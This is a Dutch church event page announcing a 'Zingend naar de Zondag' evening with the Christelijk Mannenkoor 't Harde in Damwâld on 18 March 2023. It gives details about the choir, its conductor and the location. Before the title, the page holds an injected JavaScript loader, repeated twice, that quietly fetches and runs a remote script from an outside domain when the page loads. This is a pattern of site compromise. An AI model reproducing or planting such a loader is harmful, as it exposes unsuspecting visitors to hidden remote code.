;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag met het Christelijk Mannenkoor ´t Harde - PKN Damwâld
18 maart 2023
19:30 t/m 21:30
de Ontmoeting
Zingend naar de Zondag met het Christelijk Mannenkoor ´t Harde

Op zaterdagavond 18 maart aanstaande zal het ruim 100 leden tellend Christelijk Mannenkoor ´t Harde haar medewerking verlenen aan Zingend naar de Zondag in de Ontmoeting aan de Foarwei in Damwâld. Dit koor is opgericht in 1963 en verleent zeer regelmatig medewerking aan concerten en zangavonden. Het Mannenkoor geniet vooral bekendheid, zowel plaatselijk, regionaal als ook landelijk, door het zingen van psalmen, gezangen en andere geestelijke liederen. Daarnaast voert het koor klassieke werken uit in diverse talen en behoren negro-spirituals en vaderlandse liederen tot haar repertoire. Dat alles is op de diverse CD’s te beluisteren. Het koor wil “Zingend Getuigen” van het Koninkrijk van God dat aanstaande is. Daarom klinkt in de liederen door, de oproep tot geloof in Hem onze Heere Jezus, Heiland en Koning. Het koor staat onder leiding van dirigent Henk van der Maten. Hij werkt als organist, pianist, toetsenist en dirigent vaak mee aan uiteenlopende concerten, zangavonden en Radio en TV opnames en schrijft en arrangeert muziek. Op dit moment is hij dirigent van 4 verschillende koren.

De presentatie deze avond is in de vertrouwde handen van Froukje Wesseling uit de Tike. Zij is o.a. pastoraal medewerkster en ze begeleidt regelmatig uitvaarten.

Wij nodigen u allen weer van harte uit om aanwezig te zijn, bekende liederen te zingen en te beluisteren en vooral te genieten van een hopelijk wederom prachtige avond.

De aanvang is om 19.30 uur en er is een collecte om te voorzien in de kosten van het koor en de organisatie.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld